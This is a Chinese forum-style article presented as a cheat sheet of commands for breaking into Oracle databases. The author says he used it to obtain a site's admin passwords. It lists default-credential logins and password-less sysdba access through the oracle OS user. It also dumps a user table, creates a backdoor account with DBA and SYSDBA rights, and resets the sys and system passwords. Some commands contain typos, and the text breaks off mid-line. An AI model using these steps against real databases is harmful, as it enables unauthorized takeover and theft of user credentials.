資料庫安全:入侵Oracle資料庫常用操作命令

【原創文章，合作網站如欲轉載，請註明出處「賽迪網」和文章作者「hank4ever」！】

【賽迪網-IT技術報道】【論壇作者稿件】最近遇到一個使用了Oracle資料庫的伺服器，在狂學Oracle+請教高手後終於搞到了網站後台管理界面的所有用戶密碼。我發現Oracle操作起來真是太麻煩，為了兄弟們以後少走些彎路，我把入侵當中必需的命令整理出來。

1、su oracle 不是必需，適合於沒有DBA密碼時使用，可以不用密碼來進入sqlplus界面。

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

3、SQL>connect / as sysdba ;（as sysoper）或

connect internal/oracle AS SYSDBA ;(scott/tiger)

conn sys/change_on_install as sysdba;

4、SQL>startup; 啟動資料庫實例

5、查看當前的所有資料庫: select * from v$database;

select name from v$database;

6、desc v$databases; 查看資料庫結構字段

7、怎樣查看哪些用戶擁有SYSDBA、SYSOPER權限:

SQL>select * from V_$PWFILE_USERS;

Show user;查看當前資料庫連接用戶

8、進入test資料庫：database test;

9、查看所有的資料庫實例：select * from v$instance；

如：ora9i

10、查看當前庫的所有資料表：

SQL> select TABLE_NAME from all_tables;

select * from all_tables;

SQL> select table_name from all_tables where table_name like '%u%';

TABLE_NAME

------------------------------

_default_auditing_options_

11、查看表結構：desc all_tables;

12、顯示CQI.T_BBS_XUSER的所有字段結構：

desc CQI.T_BBS_XUSER;

13、獲得CQI.T_BBS_XUSER表中的記錄：

select * from CQI.T_BBS_XUSER;

14、增加資料庫用戶：(test11/test)

create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

15、用戶授權:

grant connect,resource,dba to test11;

grant sysdba to test11;

commit;

16、更改資料庫用戶的密碼：(將sys與system的密碼改為test.)

alter user sys indentified by test;

alter user system indentified by test;

(